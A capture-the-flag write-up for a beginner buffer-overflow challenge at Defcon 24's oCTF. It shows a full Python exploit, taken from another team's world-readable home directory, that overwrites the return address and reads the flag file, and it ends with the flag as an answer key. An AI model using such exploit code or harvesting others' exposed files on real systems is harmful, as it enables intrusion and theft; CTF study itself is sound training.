Description:

    Baby's first Buffer OverFLow (https://en.wikipedia.org/wiki/Buffer_overflow).
    Server: 172.31.1.39:1618
    Binary: 172.31.0.10/tyro_overflow1_0601e9d93a2ff84ae7a85dc199fa8233

Part of the infrastructure provided at Defcon 24's oCTF was a jumpbox, with an account for every team.

While using the jumpbox was not mandatory, it was a convenient place to put files for your team to use.

What may not have been immediately obvious was that your team's home directory was world readable.

Fortunately, team lbcb left their solution to this challenge in their home directory.

To get the flag, simply run another team's exploit:

    #!/usr/bin/env python2

    # Stolen from lbcb

    import struct
    #from sock import Sock
    from socket import create_connection

    import time

    success_addr = 0x0804858D
    pl = 150 * struct.pack('<I', success_addr)

    #s = Sock(('172.31.1.39:1618'), timeout=5)
    s = create_connection(('172.31.1.39', 1618), timeout=5)

    print s.recv(1024)

    s.send(pl + '\n')

    s.send('cat /home/challenge/flag\n')

    time.sleep(1)

    print s.recv(2048)

Answer:

    only_T3h_very_bestOverflowz